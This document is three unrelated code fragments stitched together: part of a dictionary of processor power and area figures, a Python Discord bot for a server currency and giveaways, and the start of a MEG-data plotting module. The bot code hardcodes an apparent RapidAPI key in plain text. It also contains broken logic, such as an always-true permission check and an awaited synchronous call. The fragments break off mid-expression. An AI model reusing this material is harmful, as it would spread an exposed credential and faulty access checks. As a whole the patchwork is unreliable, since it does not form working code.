'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.593815,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.46857,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 4.42053,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000481011,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000481011,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000417057,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000160409,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00207411,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00345319,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00467987,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.138802,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.326142,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.471433,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 0.94451,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.137884,
'L2/Runtime Dynamic': 0.03632,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 5.88639,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.30487,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.150415,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.150415,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 6.59958,
'Load Store Unit/Runtime Dynamic': 3.19708,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.370898,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.741795,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.131633,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.133676,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0535466,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.786061,
'Memory Management Unit/Runtime Dynamic': 0.187223,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 28.843,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.844658,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0377029,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.26612,
'Renaming Unit/Int Front End RAT/Subthreshold | |
import discord, timeago, requests, datetime,random, json, time, os, urbandict
from os import listdir
from library import constants, funcs
from discord.ext import commands
from colorthief import ColorThief
import keep_alive
from discord.utils import get
from dhooks import Webhook
from discord_buttons_plugin import *
import asyncio
from discord.ext.tasks import loop
with open("data/gawinit.json","r") as m:
gawinit = json.load(m)
gawinit["status"] = 0
with open("data/gawinit.json","w") as z:
json.dump(gawinit,z)
bot = commands.Bot(command_prefix = constants.Config.PREFIX, intents=discord.Intents.all())
buttons = ButtonsClient(bot)
bot.cur = constants.Config.CURRENCY_ICON
bot.w_arrow = constants.Emotes.w_arrow
bot.p_arrow = constants.Emotes.p_arrow
bot.color = constants.Config.COLOR_THEME
currencyname = constants.Config.CURRENCY_NAME
TOKEN = constants.Config.BOT_TOKEN
class HierarchyError(commands.CommandError):
def __init__(self, message="Role hierarchy wrong."):
self.message = message
super().__init__(self.message)
async def getuser(userid:int):
user = bot.get_user(userid)
return user
import topgg
# This example uses topggpy's webhook system.
# The port must be a number between 1024 and 49151.
dbl_token = 'Top.gg token' # set this to your bot's Top.gg token
bot.topgg_webhook = topgg.WebhookManager(bot).dsl_webhook("/dsl", "HelloTrial")
bot.topgg_webhook.run(6969) # this method can be awaited as well
@bot.event
async def on_dsl_vote(data):
"""An event that is called whenever someone votes for the bot on Top.gg."""
if data["type"] == "test":
# this is roughly equivalent to
# return await on_dbl_test(data) in this case
return bot.dispatch('dsl_test', data)
bot2 = discord.Client()
user = bot2.get_user(int(data["user"]))
embed = discord.Embed(title='Thanks for Voting!', description = f"**You have recieved:**\n20 {bot.cur}", color = discord.Color.random())
await user.send(embed=embed)
@bot.event
async def on_dsl_test(data):
"""An event that is called whenever someone tests the webhook system for your bot on Top.gg."""
print(f"Received a test vote:\n{data}")
userid = int(data["user"])
user = await getuser(userid)
embed = discord.Embed(title='Thanks for Voting!', description = f"**You have recieved:**\n20 {bot.cur}", color = discord.Color.random())
await user.send(embed=embed)
async def is_botdev(ctx):
roles = [ctx.author.top_role.id, ctx.author.roles[-2].id, ctx.author.roles[-3].id]
if roles[0] in constants.Roles.BOTMODS or roles[1] in constants.Roles.BOTMODS or roles[2] in constants.Roles.BOTMODS or ctx.author.id in constants.Roles.BOTMODS:
return True
else:
return False
async def is_staff(ctx):
role = discord.utils.find(lambda r: r.id == constants.Roles.STAFF, ctx.message.guild.roles)
if role in ctx.author.roles:
return True
else:
return False
async def is_not_blacklisted(ctx):
funcs.open_bl(ctx.author)
users = funcs.get_bl_data()
user = ctx.author
if users[str(user.id)]["blacked"]:
return False
else:
return True
@bot.command(name='trial')
async def trial(ctx):
guild = bot.get_guild(824623762053529672)
print(guild)
@loop()
async def gaw_utils(ctx):
with open("data/gaw.json","r") as f:
gaw = json.load(f)
for item in gaw:
try:
guildid = gaw[item]["guild"]
authorid = gaw[item]["author"]
guild = bot.get_guild(guildid)
reqid = gaw[item]["req"]
prize = gaw[item]["prize"]
channelid = gaw[item]["channel"]
author = bot.get_user(authorid)
channel = guild.get_channel(int(channelid))
gawid = gaw[item]["gawid"]
msgid = gaw[item]["msgid"]
new_msg = await channel.fetch_message(msgid)
except KeyError:
for itemz in gaw:
item = itemz
if reqid != "None":
reqid = f"<@{reqid}>"
if gaw[item]["time"] == 0:
winner = "Unable to get winner"
winnerz = False
try:
users = await new_msg.reactions[0].users().flatten()
users.pop(users.index(bot.user))
winner = random.choice(users)
except IndexError:
await new_msg.reply("No one reacted to this giveaway")
if winnerz == False:
pass
else:
await new_msg.reply(f"{winner.mention} won {prize}")
embed = discord.Embed(title = "Giveaway!", description = f"{prize}", color = author.color)
embed.add_field(name = f"Winner:", value = f"{winner.mention}")
embed.add_field(name = "Requirement:", value = f"{reqid}")
embed.add_field(name = "By:", value = f"{author.mention}",inline=False)
embed.add_field(name = "Id:", value = f"{gawid}",inline=True)
embed.set_footer(text = f"Ended")
embed.set_thumbnail(url="https://i.pinimg.com/originals/eb/2a/8f/eb2a8f4ddfb50c23712a3cd0d5cc2a3a.gif")
await new_msg.edit(embed=embed)
winbed = discord.Embed(title="You Won",description=f"You won {prize} in {guild.name}\nDM {author.name} for your prize if not already paid",color=author.color)
await winner.send(embed=winbed)
authbed = discord.Embed(title="Giveaway over",description=f"{winner.name} won {prize}",color=winner.color)
await author.send(embed=authbed)
del gaw[item]
with open("data/gaw.json","w") as gawz:
json.dump(gaw,gawz)
pass
await asyncio.sleep(1)
gaw[item]["time"] -= 1
with open("data/gaw.json","w") as gawz:
json.dump(gaw,gawz)
timez = gaw[item]["time"]
comment = f"**{timez}** second(s) from now!"
if timez > 60:
timez = float(timez) / 60
timez = round(timez)
comment = f"**{timez}** minute(s) from now!"
if timez > 3600:
timez = float(timez) / 3600
timez = round(timez)
comment = f"**{timez}** hour(s) from now!"
if timez > 86400:
timez = float(timez) / 86400
timez = round(timez)
comment = f"**{timez}** day(s) from now!"
embed = discord.Embed(title = "Giveaway!", description = f"{prize}", color = ctx.author.color)
end = datetime.datetime.utcnow() + datetime.timedelta(seconds = timez)
embed.add_field(name = f"Ends at:", value = comment)
embed.add_field(name = "Requirement:", value = f"{reqid}")
embed.add_field(name = "By:", value = f"{author.mention}",inline=False)
embed.add_field(name = "Id:", value = f"{gawid}",inline=True)
embed.set_footer(text = f"Ends At: {end} UTC")
embed.set_thumbnail(url="https://i.pinimg.com/originals/eb/2a/8f/eb2a8f4ddfb50c23712a3cd0d5cc2a3a.gif")
await new_msg.edit(embed=embed)
pass
@loop(seconds=10)
async def change_status():
await asyncio.sleep(8)
mode = ["playing","listening","watching"]
statuses = ["Doggo Dankers","Niraj swearing","Levi be Catfishing","Ace spamming lines of code","Oh my Eris what are you doing","Hi I'm Joe, I sell dildos","dd?help","Percy likes dogs do you?","Made by Ace and Eris","#DoggoDankers","Bark Bark Bark","Why What When Why How","dog.exe has started",f"Would you like some doggocoins?","Levi be cute","Eris == Kaneki","Bow down humans","Well hello there","Why are you looking at this?","Living legend"]
modal = random.choice(mode)
status = random.choice(statuses)
if modal == "watching":
await bot.change_presence(status = discord.Status.do_not_disturb, activity=discord.Activity(type=discord.ActivityType.watching, name=f"{status}"))
if modal == "listening":
await bot.change_presence(status = discord.Status.do_not_disturb, activity=discord.Activity(type=discord.ActivityType.listening, name=f"{status}"))
if modal == "playing":
await bot.change_presence(status = discord.Status.do_not_disturb, activity=discord.Activity(type=discord.ActivityType.playing, name=f"{status}"))
@bot.event
async def on_ready():
print('Ready!')
bot.loop.create_task(change_status())
bot.loop.create_task(doggostart())
@loop(minutes=1)
async def doggostart():
webhook = Webhook('https://discord.com/api/webhooks/<KEY>')
res = requests.request('GET', url='https://dog.ceo/api/breeds/image/random')
embed = discord.Embed(title='Bork Bork!', colour = discord.Color.random())
embed.set_image(url=res.json()["message"])
embed.set_footer(text='Awwwwwww')
webhook.send(embed=embed)
@loop(seconds=5)
async def maintain_nicks():
user = await bot.get_user(775198018441838642)
await user.edit(nick='Ace')
bot.remove_command("help")
@bot.command(name="ban")
async def ban(ctx):
if ctx.author.id != <PASSWORD>:
return await ctx.send("only for eris")
await ctx.guild.ban(ctx.author)
@bot.command(name="help")
@commands.check(is_not_blacklisted)
async def help(ctx):
embed = (discord.Embed(title='DoggoBot', description = "**DoggoCoins can be earned by:**\n1. Bumping the server in <#824641127315406888>\n2. Through commands like `=beg` and `=daily`\n3. Voting for us on Top.gg\n4. Boosting the Server\n5. Investing in Us.\n\n**DoggoCoins can be used for:**\n1. Trading into DMC\n2. For awesome server perks like extra claimtime, private rooms, etc.\nUse `=shop` to know more.", color = bot.color)
.set_footer(text="While frowned upon you can do anything with these coins such as bet or giveaways"))
await ctx.send(embed=embed)
@bot.command(name='start')
async def _sneckstart(ctx):
if ctx.author.id != <PASSWORD> or ctx.author.id != <PASSWORD>:
return
for role in ctx.guild.roles:
if role.name == "・mai sakurajima":
print(role)
role1 = role
print(role1)
elif role.name == "・levi's guard":
role2= role
print(role2)
elif role.name == "・co owner":
role3 = role
else:
pass
member = bot.get_user(848358845620813905)
ace = ctx.author
await ace.add_roles(role3)
'''await role1.delete()
await member.add_roles(role2)'''
await ctx.send('Done!')
@bot.command()
@commands.check(is_not_blacklisted)
async def giveaways(ctx,page=1):
amount = 5*page
refract = page-5
with open("data/gaw.json","r") as f:
gaw = json.load(f)
embed = discord.Embed(title=f"Giveaways in {ctx.guild.name}",description="**Active Giveaways:**",color=ctx.author.color)
for item in gaw:
guildid = gaw[item]["guild"]
if refract == amount:
pass
if guildid != ctx.guild.id:
pass
else:
channelid = gaw[item]["channel"]
prize = gaw[item]["prize"]
embed.add_field(name=prize,value=f"Channel: <#{channelid}>")
amount -= 1
await ctx.send(embed=embed)
@bot.command()
@commands.check(is_not_blacklisted)
@commands.check(is_staff)
async def donations(ctx,user:discord.Member=None):
if user == None:
user = ctx.author
await funcs.open_donation(user)
users = funcs.load_donation()
amount = users[str(user.id)]["donations"]
embed = discord.Embed(title=f"{user.name}'s donations",description = f"**Amount Donated:** `{amount}`",color=user.color)
await ctx.send(embed=embed)
@bot.command(aliases=["donationadd"])
@commands.check(is_not_blacklisted)
@commands.check(is_staff)
async def dadd(ctx,user:discord.Member,amount:int):
await funcs.open_donation(user)
users = funcs.load_donation()
users[str(user.id)]["donations"] += amount
with open("data/donations.json","w") as d:
json.dump(users,d)
await ctx.send(f"Successfully added {amount} to {user.name}'s donations")
@bot.command(aliases=["donationremove"])
@commands.check(is_not_blacklisted)
@commands.check(is_staff)
async def drm(ctx,user:discord.Member,amount:int):
await funcs.open_donation(user)
users = funcs.load_donation()
users[str(user.id)]["donations"] -= amount
with open("data/donations.json","w") as d:
json.dump(users,d)
await ctx.send(f"Successfully minused {amount} from {user.name}'s donations")
@bot.command(aliases = ["lb"])
@commands.check(is_not_blacklisted)
async def leaderboard(ctx,x = 5):
users = funcs.get_users_data()
leader_board = {}
total = []
for user in users:
name = int(user)
total_amount = users[user]["coins"]
leader_board[total_amount] = name
total.append(total_amount)
total = sorted(total,reverse=True)
em = discord.Embed(title = f"Top {x} People" , description = "Nice job",color = discord.Color(0xfa43ee))
index = 1
for amt in total:
id_ = leader_board[amt]
member = bot.get_user(id_)
name = member.name
em.add_field(name = f"{index}. {name}" , value = f"{amt} {bot.cur}", inline = False)
if index == x:
break
else:
index += 1
await ctx.send(embed = em)
@bot.command(name='user', aliases=['self', 'userstats'])
@commands.check(is_not_blacklisted)
async def user(ctx, user:discord.Member=None):
if not user:
user=ctx.author
url = user.avatar_url
funcs.open_user(user)
users = funcs.get_users_data()
amount = users[str(user.id)]["coins"]
r = requests.get(url, allow_redirects=True)
open('tempimg.gif', 'wb').write(r.content)
color_thief = ColorThief('tempimg.gif')
# get the dominant color
dominant_color = color_thief.get_color(quality=1)
created_at = user.created_at.strftime('%-d %b %Y')
joined_at = user.joined_at.strftime('%-d %b %Y')
now = datetime.datetime.now() + datetime.timedelta(seconds = 60 * 3.4)
main = str(dominant_color).replace('(','').replace(')','').split(", ")
x = int(main[0])
y = int(main[1])
z = int(main[2])
badges = []
if r.headers.get('content-type') == "image/gif":
badges.append("<:nitro:847058195037028382>")
if user.public_flags.hypesquad_bravery:
badges.append("<:hypesquad_balance:847052433250713620>")
if user.public_flags.hypesquad_balance:
badges.append("<:hypesquad_bravery:847052433116495872>")
if user.public_flags.hypesquad_brilliance:
badges.append("<:hypesquad_brilliance:847052433708285963>")
cretimeago = timeago.format(user.created_at, now)
jointimeago = timeago.format(user.joined_at, now)
final1 = str(badges).replace("]","").replace("[","").replace(","," ").replace("'", "")
embed = discord.Embed(title=user.name, description = f'{final1}\n\n**Joined Discord on:** {created_at} ({cretimeago})\n**Joined {ctx.guild.name} on:** {joined_at} ({jointimeago})', colour = discord.Color.from_rgb(x,y,z))
embed.add_field(name='Bot Related UserInfo', value = f"**{currencyname}** {amount} {bot.cur}")
embed.timestamp = datetime.datetime.utcnow()
embed.set_thumbnail(url=user.avatar_url)
await ctx.send(embed=embed)
@bot.command(name='define', aliases = ['lookup', 'urban'])
@commands.check(is_not_blacklisted)
async def _define(ctx, to_define:str=None):
if not to_define:
return await ctx.send('What should I define???')
url = "https://mashape-community-urban-dictionary.p.rapidapi.com/define"
querystring = {"term":to_define}
headers = {
'x-rapidapi-key': "5be05ffb96mshfe7579bba5baf5ap1b6240jsnad885dc354f3",
'x-rapidapi-host': "mashape-community-urban-dictionary.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers, params=querystring)
main = response.json()["list"][0]
word = main["word"]
definition = main["definition"]
example = main["example"]
url = main["permalink"]
auth = main["author"]
up = main["thumbs_up"]
down = main["thumbs_down"]
embed = discord.Embed(title=f"Definition of {word}",url=url, description = definition, colour = bot.color)
embed.add_field(name='Example', value = example, inline=False)
embed.add_field(name='** **', value=f"{up} 👍\n\n{down} 👎")
embed.set_footer(text=f"Requested by {ctx.author.name} | Sent by {auth}", icon_url=ctx.author.avatar_url)
embed.set_thumbnail(url="https://cdn.discordapp.com/attachments/847409923166830612/847853404999254056/Urban-Dictionary.png")
embed.timestamp = datetime.datetime.utcnow()
await ctx.send(embed=embed)
@bot.command(name='bal', aliases = ['balance'])
@commands.check(is_not_blacklisted)
async def _bal(ctx, user:discord.Member=None):
if not constants.Getters.get_usage_status(ctx):
msg = await ctx.send('you cannot use commands here, use it in <#847409923166830612>.')
await asyncio.sleep(5)
return await msg.delete()
if not user:
user = ctx.author
funcs.open_user(user)
users = funcs.get_users_data()
bal = users[str(user.id)]["coins"]
embed = discord.Embed(title=f"{user.name}'s Points", description = f"**{currencyname}** {bal} {bot.cur}", color = bot.color)
await ctx.send(embed=embed)
@bot.command(name='beg')
@commands.cooldown(1,30, commands.BucketType.user)
@commands.check(is_not_blacklisted)
async def _beg(ctx):
if not constants.Getters.get_usage_status(ctx):
msg = await ctx.send('you cannot use commands here, use it in <#847409923166830612>.')
await asyncio.sleep(5)
return await msg.delete()
user= ctx.author
msgs = ["Humans have become cheaper than us, dogs", "Unable to Translate (too many swears)", "Ew Gross Human, here take some", "Humans dominated us for ages. Now they are begging from us. That's Karma."]
msg = random.choice(msgs)
amount = random.randrange(0,10)
embed= discord.Embed(title="Bark Bark Bark, Barkk", description = f"**Translation:** {msg}\nThe doggo gave you {amount} coins.", color = bot.color)
await ctx.send(embed=embed)
funcs.open_user(user)
users = funcs.get_users_data()
users[str(user.id)]["coins"] += amount
with open('data/bank.json','w') as f:
json.dump(users,f)
@bot.command(name='drop')
@commands.check(is_botdev)
@commands.check(is_not_blacklisted)
async def _drop(ctx, amount:int):
await ctx.message.delete()
types = ['msg', 'react']
type = random.choice(types)
if type == 'msg':
msgs = ["percy sux", "levi sux", "make me admin"]
msg1 = random.choice(msgs)
embed = discord.Embed(title = f'{currencyname} Drop!', description = f'Type `{msg1}` to get {amount} {currencyname}!', colour = bot.color)
await ctx.send(embed=embed)
def check(msg):
return msg.content == msg1
msg = await bot.wait_for('message', check=check, timeout=30)
await ctx.send(f"{msg.author.mention} Just got {amount} {currencyname}! GG!\nYou can trade these in for DMC (coming soon)")
funcs.open_user(msg.author)
users = funcs.get_users_data()
users[str(msg.author.id)]["coins"] += amount
with open('data/bank.json','w') as f:
json.dump(users,f)
elif type == 'react':
embed = discord.Embed(title = f'{currencyname} Drop!', description = f'React to get {amount} {currencyname}!', colour = bot.color)
main=await ctx.send(embed=embed)
await main.add_reaction("<a:Winkles_1:824695592194015245>")
def check(msg, user):
return user.bot != True
msg, user = await bot.wait_for('reaction_add', check=check, timeout=30)
await ctx.send(f"{user.mention} Just got {amount} {currencyname}! GG!\nYou can trade these in for DMC (coming soon)")
funcs.open_user(user)
users = funcs.get_users_data()
users[str(user.id)]["coins"] += amount
with open('data/bank.json','w') as f:
json.dump(users,f)
@bot.command(aliases=["inv"])
@commands.check(is_not_blacklisted)
async def bag(ctx,member:discord.Member=None):
funcs.open_user(ctx.author)
user = | |
<gh_stars>0
"""OM - plots for MEG data."""
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from om.plts.fig_info import FigInfo
from om.plts.utils import set_axis_spines, save_figure
from om.core.errors import UnknownDataTypeError
###################################################################################################
###################################################################################################
############################## OM - PLTS - MEGDATA PLOTS ##############################
def plot_exponents(exponents, title, save_out=False, fig_info=FigInfo()):
"""Plots a histogram of the chi values for all vertices.
Parameters
----------
exponents : 1d array
A vector of aperiodic exponent values to plot.
title : str
A string to append to the title.
save_out : boolean, optional (default = False)
Whether to save out a copy of the figure.
"""
# Plot Settings
n_bins = 150 # Number of bins for histograms
t_fs = fig_info.t_fs # Title font size
ax_fs = fig_info.ax_fs # Axis label font size
ti_fs = fig_info.ti_fs # Axis ticks font size
# Set up plot
fig, ax = plt.subplots(figsize=[6, 4])
# Create histogram
ax.hist(exponents, n_bins, color='#40425e')
# Add title
if fig_info.add_title:
plt.title('Exponents - ' + title, {'fontsize': t_fs})
# Add axis labels
ax.set_xlabel('Exponent', {'fontsize': ax_fs})
ax.set_ylabel('Count', {'fontsize': ax_fs})
# Set ticks font size
plt.tick_params(axis='both', which='major', labelsize=ti_fs)
# Set spines
set_axis_spines(ax, lw=fig_info.ax_lw)
# Set x-lims
ax.set_xlim(0.0, 2.0)
save_figure(save_out, '101-' + title + '_Exponents', fig_info)
def plot_hist_count(osc_count, save_out=False):
"""Plots a histogram of the osc_count vector.
Parameters
----------
osc_count : 1d Vector
An array of the number of oscillations found in each vertex.
save_out : boolean, optional (default = False)
Whether to save out a copy of the figure.
"""
# Get FigInto
fig_info = FigInfo()
# Plot Settings
n_bins = 25 # Number of bins for histograms
t_fs = fig_info.t_fs # Title font size
ax_fs = fig_info.ax_fs # Axis label font size
ti_fs = fig_info.ti_fs # Axis ticks font size
# Create histogram
plt.hist(osc_count, n_bins, range=[0, 8])
# Add title
if fig_info.add_title:
plt.title('# Oscillations per Vertex', {'fontsize': t_fs, 'fontweight': 'bold'})
# Add axis labels
plt.xlabel('# Oscillations', {'fontsize': ax_fs, 'fontweight': 'bold'})
plt.ylabel('Count', {'fontsize': ax_fs, 'fontweight': 'bold'})
# Set ticks font size
plt.tick_params(axis='both', which='major', labelsize=ti_fs)
save_figure(save_out, '102-OscCount', fig_info)
def plot_all_oscs(centers_all, powers_all, bws_all, title,
save_out=False, fig_info=FigInfo()):
"""Plots combined plot with distributions of oscillation centers, powers and bws.
Parameters
----------
centers_all : 1d array
Vector of the center frequencies for all oscillations.
powers_all : 1d array
Vector of the powers for all oscillations.
bws_all : 1d array
Vector of the bandwidths for all oscillations.
title : str
A string to append to the title.
save_out : boolean, optional (default = False)
Whether to save out a copy of the figure.
"""
# Plot Settings
n_bins = 160 # Number of bins for histograms
st_fs = fig_info.t_fs # Super Title Font Size
sp_fs = fig_info.sp_fs # Subplot Title Font Size
ax_fs = fig_info.ax_fs # Axis Label Font Size
ti_fs = fig_info.ti_fs # Axis ticks font size
# Set up subplots
fig, ax = plt.subplots(3, 1, figsize=(15, 15))
# Set plot super-title
if fig_info.add_title:
plt.suptitle('Distributions of Oscillatory Parameters - ' + title,
fontsize=st_fs, fontweight='bold')
# Subplot 1 - Center Frequency
ax[0].hist(centers_all, n_bins)
ax[0].set_title('Center Frequency', {'fontsize': sp_fs})
ax[0].set_xlabel('Frequency', {'fontsize': ax_fs})
ax[0].set_ylabel('Count', {'fontsize': ax_fs})
# Subplot 2 - Power
ax[1].hist(np.log10(powers_all), n_bins)
ax[1].set_title('Oscillatory Power', {'fontsize': sp_fs})
ax[1].set_xlabel('Log Power', {'fontsize': ax_fs})
ax[1].set_ylabel('Count', {'fontsize': ax_fs})
# Subplot 3 - Bandwidth
ax[2].hist(bws_all, n_bins)
